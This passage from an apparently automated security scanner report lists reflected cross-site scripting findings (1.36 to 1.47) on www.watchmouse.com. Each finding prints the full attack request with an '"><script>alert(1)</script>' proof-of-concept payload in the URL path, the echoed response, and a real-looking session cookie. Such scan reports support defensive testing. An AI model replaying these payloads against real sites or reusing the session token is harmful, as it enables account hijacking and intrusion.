User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-9acad7d7cf6c6aff11173026556b6bf9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets546d8"><script>alert(1)</script>1957a09d746/js/learn_more.js" method="post">
...[SNIP]...

1.36. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c169e"><script>alert(1)</script>f515e35e551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsc169e"><script>alert(1)</script>f515e35e551/learn_more.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e0c6ecfe66186619814677f21436921e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsc169e"><script>alert(1)</script>f515e35e551/learn_more.js" method="post">
...[SNIP]...

1.37. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbedf"><script>alert(1)</script>c948edd7dca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/learn_more.jsdbedf"><script>alert(1)</script>c948edd7dca HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f3d58c2b8266d5d2655afc1aaeedd0e5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/learn_more.jsdbedf"><script>alert(1)</script>c948edd7dca" method="post">
...[SNIP]...

1.38. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fcb"><script>alert(1)</script>510d1ce03e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets56fcb"><script>alert(1)</script>510d1ce03e8/js/ui/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ce06e2405edc79e50fdf753f288b2ae7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets56fcb"><script>alert(1)</script>510d1ce03e8/js/ui/ui.core.js" method="post">
...[SNIP]...

1.39. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcb9d"><script>alert(1)</script>17bf27560ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsfcb9d"><script>alert(1)</script>17bf27560ac/ui/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-6d3a1bcd8795ec9d89abcfc49c7b3e7a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsfcb9d"><script>alert(1)</script>17bf27560ac/ui/ui.core.js" method="post">
...[SNIP]...

1.40. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef56"><script>alert(1)</script>551c8dbd435 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui4ef56"><script>alert(1)</script>551c8dbd435/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e7d9e587f88ccbe7dba0f5cfdc66e3f7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui4ef56"><script>alert(1)</script>551c8dbd435/ui.core.js" method="post">
...[SNIP]...

1.41. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696b8"><script>alert(1)</script>aaa3a7ee68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.core.js696b8"><script>alert(1)</script>aaa3a7ee68 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1f1a739655918ad669f911b89774a63b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.core.js696b8"><script>alert(1)</script>aaa3a7ee68" method="post">
...[SNIP]...

1.42. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7391b"><script>alert(1)</script>3f75f90d2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets7391b"><script>alert(1)</script>3f75f90d2e1/js/ui/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a4d9dd4d4e4aa290ffb12873588047fa"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets7391b"><script>alert(1)</script>3f75f90d2e1/js/ui/ui.dialog.js" method="post">
...[SNIP]...

1.43. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc72"><script>alert(1)</script>39488c56b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsfcc72"><script>alert(1)</script>39488c56b3e/ui/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a35a829315c5d70c01dacb3cc4ab4c9a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsfcc72"><script>alert(1)</script>39488c56b3e/ui/ui.dialog.js" method="post">
...[SNIP]...

1.44. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ce8"><script>alert(1)</script>0413cee298f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui82ce8"><script>alert(1)</script>0413cee298f/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-54194b6bbf105148acf4bb214716d334"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui82ce8"><script>alert(1)</script>0413cee298f/ui.dialog.js" method="post">
...[SNIP]...

1.45. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c85"><script>alert(1)</script>c06a7faf2bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.dialog.js15c85"><script>alert(1)</script>c06a7faf2bf HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-73d6f4d052308738a0bfef16978a4f43"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.dialog.js15c85"><script>alert(1)</script>c06a7faf2bf" method="post">
...[SNIP]...

1.46. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e41"><script>alert(1)</script>844a2f28eff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets91e41"><script>alert(1)</script>844a2f28eff/js/ui/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ffd55a331fbec171dad0d6a3256aee0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets91e41"><script>alert(1)</script>844a2f28eff/js/ui/ui.draggable.js" method="post">
...[SNIP]...

1.47. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

